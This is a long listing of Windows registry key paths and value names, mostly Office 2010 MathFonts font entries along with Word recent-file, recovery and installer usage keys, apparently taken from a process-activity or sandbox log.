HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\32BA2
32BA2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\32BA2
32BA2
